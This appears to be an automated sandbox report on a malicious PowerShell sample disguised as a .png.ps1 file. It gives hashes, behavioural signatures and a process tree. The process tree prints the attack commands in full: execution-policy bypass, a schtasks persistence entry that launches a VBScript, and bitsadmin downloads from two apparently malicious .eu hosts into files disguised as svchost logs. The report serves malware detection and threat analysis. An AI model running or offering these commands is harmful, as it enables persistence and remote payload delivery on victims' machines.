Analysis
-
max time kernel
127s -
max time network
137s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
29-11-2024 12:14
Static task
static1
Behavioral task
behavioral1
Sample
YQpjoXnBJr/WRQDouwL.ps1
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
YQpjoXnBJr/WRQDouwL.ps1
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
YQpjoXnBJr/WRQDouwL.png.ps1
Resource
win7-20240903-en
General
-
Target
YQpjoXnBJr/WRQDouwL.png.ps1
-
Size
304KB
-
MD5
803d84838415f3c36742821f70203a8f
-
SHA1
e3b4bc28676f9f1c2c71fff706d240e9557df75e
-
SHA256
e20d63d82415c54f408d750f77b1442b4540e1e7eca70cc5e77fc06a093a1eec
-
SHA512
e083ed91c0eb5316d12ba090f2c14ed8a01075ebbb25a47f1f30ef56bf9877556aebb9e12ea0d39ef7ff5fcfd98e43c6c4fdb828936264e5abe75f2620277000
-
SSDEEP
1536:xoXGg/lCHSnPiCqoUZRCHJt50IRNGTRwOs3iFXO57fEPmjwl3Fo5+w5vKBx9SG0W:fmmp
Malware Config
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
bitsadmin.exebitsadmin.exedescription pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2916 5116 bitsadmin.exe 87 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3048 5116 bitsadmin.exe 87 -
Download via BitsAdmin 1 TTPs 2 IoCs
Processes:
bitsadmin.exebitsadmin.exepid Process 2916 bitsadmin.exe 3048 bitsadmin.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.EXEdescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation wscript.EXE -
Processes:
powershell.exepowershell.exepid Process 3092 powershell.exe 4312 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid Process 3092 powershell.exe 3092 powershell.exe 4312 powershell.exe 4312 powershell.exe 4312 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 3092 powershell.exe Token: SeDebugPrivilege 4312 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
powershell.exewscript.EXEpowershell.exedescription pid Process procid_target PID 3092 wrote to memory of 4572 3092 powershell.exe 84 PID 3092 wrote to memory of 4572 3092 powershell.exe 84 PID 3092 wrote to memory of 3108 3092 powershell.exe 85 PID 3092 wrote to memory of 3108 3092 powershell.exe 85 PID 2140 wrote to memory of 4312 2140 wscript.EXE 104 PID 2140 wrote to memory of 4312 2140 wscript.EXE 104 PID 4312 wrote to memory of 1528 4312 powershell.exe 108 PID 4312 wrote to memory of 1528 4312 powershell.exe 108 PID 4312 wrote to memory of 3552 4312 powershell.exe 111 PID 4312 wrote to memory of 3552 4312 powershell.exe 111 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\YQpjoXnBJr\WRQDouwL.png.ps11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3092 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /query /FO CSV /v2⤵PID:4572
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /F /create /sc minute /mo 4 /TN "S0xiGXlCwrI" /ST 07:00 /TR "wscript /nologo /E:vbscript c:\users\Admin\AppData\Roaming\\xiGXlCwrI\lqOYUHiD.rock"2⤵
- Scheduled Task/Job: Scheduled Task
PID:3108
-
-
C:\Windows\system32\wscript.EXEC:\Windows\system32\wscript.EXE /nologo /E:vbscript c:\users\Admin\AppData\Roaming\\xiGXlCwrI\lqOYUHiD.rock1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2140 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -file lqOYUHiD.ps12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4312 -
C:\Windows\system32\getmac.exe"C:\Windows\system32\getmac.exe" /fo table3⤵PID:1528
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /reset3⤵PID:3552
-
-
-
C:\Windows\system32\bitsadmin.exebitsadmin /transfer AngSyW /priority FOREGROUND "https://yjtyhm.eu/topic//ab515c4b674aa7cd8c862269bc0a7d7c.html" C:\users\Admin\AppData\Roaming\xiGXlCwrI\0_svchost.log1⤵
- Process spawned unexpected child process
- Download via BitsAdmin
PID:2916
-
C:\Windows\system32\bitsadmin.exebitsadmin /transfer AHacpJ /priority FOREGROUND "https://nmhholiut.eu/topic//ab515c4b674aa7cd8c862269bc0a7d7c.html" C:\users\Admin\AppData\Roaming\xiGXlCwrI\1_svchost.log1⤵
- Process spawned unexpected child process
- Download via BitsAdmin
PID:3048
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
1KB
MD5b8a507ea87f4db23962b175b90889f86
SHA1d7957c02ed987bbf866c98e4491a926b5453c58d
SHA256291a53a8822be2c1b654a400ccd6fbbbf90712d4eb2078ccd2d10824d4de4e2b
SHA51223c6774e1c2bb07e9eb814b60b040ebaea933bc664b9eebfa741495e89a8568ff86653b4efa58595fa94f7aff0216d132db96a871ca78600fea3e5c08b9d2bea
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2KB
MD559161dfe806fae8eb2e2244bc0e5344f
SHA1d442e547bd477651ea7784bdab988e6eaa5e4f5a
SHA25655d4414c70d53da41ec1694a86f57b522328364945a8ac7a1e640a9501acfa2b
SHA5126a250fe12de28ed6486459a59436d9405c35044da5be1a59fa34870e25c401e8f8c81f5ccf17cbf892532f497d414bc6220b2a916948f99f06671214b0c90990
-
Filesize
196KB
MD5d4f06b258da41c8260fe07e2bc280953
SHA1046a98fa4b8e4b44914884c1525c2c787c98cfa4
SHA256b89c2c4c38917239929a94d79f86076f61dde3029fb514fdc7944d7b0114a455
SHA5123bc6231d0d5aebad5f3dc45ff6c9b9391ebab51ea004acadd4b9cea96fab91a2274a04d65ca76c431048303cb2405178fcfb989db7bbac95a10ccbf42c4ce660
-
Filesize
1KB
MD5a42520d036314591d61ecb810833a0f4
SHA1f45f63c60562aadd137fe5f23d37ec5d8a1c54da
SHA256f2d2cc6bb0b77ef031d0508acb99b4c12b95ff3eff76d33aeb40b8c8695146ea
SHA51235a13ed9c17b1659f9c53ce4f53048f3dcf6e790a1b74bdcf174d3a625ad9db2e04da491f74d735bfabec54c2c7981c73ac516fe5612995836c179f792e73a9b
-
Filesize
930B
MD5b6bd012cb34ed4136998a856635e2b20
SHA11fe28b680b9bafc969cf39574c1df55a8c5f76a2
SHA2567650dea686e4e2205704530b4196bd9ab738681c5b0c998f8f1f0fcaef859bcd
SHA5123e5f72c3a8b59605e84b9034e9f8eb08f19928a8ef2d66da615b271775cd73d44403701383118d6055ccaf3217dbf6e6f6daeacdd41cf72d1f3b55a8e1de2586